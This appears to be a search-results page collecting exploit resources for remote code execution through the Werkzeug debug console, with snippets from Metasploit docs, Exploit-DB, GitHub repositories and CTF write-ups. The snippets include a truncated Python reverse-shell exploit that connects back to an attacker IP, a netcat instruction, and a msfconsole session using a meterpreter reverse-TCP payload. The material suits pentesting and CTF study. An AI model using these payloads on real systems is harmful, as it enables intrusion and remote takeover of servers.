Rapid7
rapid7.com › db › modules › exploit › multi › http › werkzeug_debug_rce
Pallete Projects Werkzeug Debugger Remote Code ...
Tested against the following Werkzeug versions: - 3.0.3 on Debian 12, Windows 11 and macOS 14.6 - 1.1.4 on Debian 12 - 1.0.1 on Debian 12 - 0.11.5 on Debian 12 - 0.10 on Debian 12 · h00die [email protected] Graeme Robinson metasploit ... To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced': ... The predictive window has collapsed. Exploitation ...
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages Python
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
People would say it's based on MSF exploit (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/werkzeug_debug_rce.rb), but as I couldn't understand at all this exploit, I did it my own exploit.
Starred by 10 users
Forked by 8 users
Languages Python
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode.
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - ## # This module requires Metasploit: ... Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell....
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
print u"\n\u001b[35;1mREMEMBER TO USE NETCAT TO CONNECT TO THE TARGET IP ALONG WITH THE PORT YOU ENTERED..\u001b[0m\n"
Author MistSpark
ctf
beerpwn.it › ctf › 2020 › NahamCon_CTF › web › Bomarr_Style
B'omarr Style, WEB 200 pti | ctf - Beerpwn
To do that I build a python script. In this script you can see that I picked up the /proc/sys/kernel/randomize_va_space file which should be present on every modern linux systems and his contents (by default) is 2\n · $ cat /proc/sys/kernel/randomize_va_space | xxd 00000000: 320a 2. I exploited the RCE using blind-time-based technique to extract the flag.txt contents, but reading other writeup I notice that I can use a python reverse shell payload to get a shell on the server.
Infomation Security
jayngng.github.io › blog › reconstruction-ospg
Reconstruction - OSPG | Infomation Security - Blog
November 8, 2021 - $ nmap --open -sV -A -p- -vv -n ... syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) 8080/tcp open http syn-ack ttl 63 Werkzeug httpd 1.0.1 (Python 3.6.9) | http-methods: |_ Supported Methods: HEAD GET OPTIONS |_http-server-header: Werkzeug/1.0.1 Python/3.6.9 ...
GitHub
github.com › rapid7 › metasploit-framework › blob › master › documentation › modules › exploit › multi › http › werkzeug_debug_rce.md
metasploit-framework/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md at master · rapid7/metasploit-framework
It may be necessary to set this to 127.0.0.1 or localhost if the target Werkzeug version is 3.0.3 or later, however this may hamper connectivity if the Host header is validated before the request is passed to the application. Determines which algorithm the exploit module will use to generate a pin and cookie. Valid values are: ... Example utilizing the previously mentioned sample app listed above. $ msfconsole -q msf > use exploit/multi/http/werkzeug_debug_rce [*] No payload configured, defaulting to python/meterpreter/reverse_tcp msf exploit(multi/http/werkzeug_debug_rce) > set RHOSTS 192.168
Author rapid7
CTFtime.org
ctftime.org › writeup › 18597
CTFtime.org / zer0pts CTF 2020 / notepad / Writeup
## 【exploit】 · Access /ttttt to get a 404 response · ↓ · ``` GET /ttttt HTTP/1.1 Host: {{7*7}} Referer: http://{{7*7}}/ Content-Length: 0 ``` ↓ · ``` HTTP/1.0 404 NOT FOUND Content-Type: text/html; charset=utf-8 Content-Length: 151 Server: Werkzeug/1.0.0 Python/3.6.9 Date: Mon, 09 Mar 2020 00:50:50 GMT ·
Medium
mathew-seelan.medium.com › hack-the-box-scriptkiddie-writeup-5dc4679b2c77
Hack The Box — ScriptKiddie Writeup | by Mathew Seelan | Medium
June 9, 2021 - Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA) | 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA) |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519) 5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5) |_http-server-header: Werkzeug/0.16.1 Python/3.8.5 |_http-title: k1d'5 h4ck3r t00l5 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed.
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-conso...
Starred by 64 users
Forked by 7 users
Languages Python 85.8% | Dockerfile 14.2%
Veracode
sca.analysiscenter.veracode.com › vulnerability-database › security › remote-code-execution-rce › python › sid-46780
Python - Remote Code Execution (RCE)
We cannot provide a description for this page right now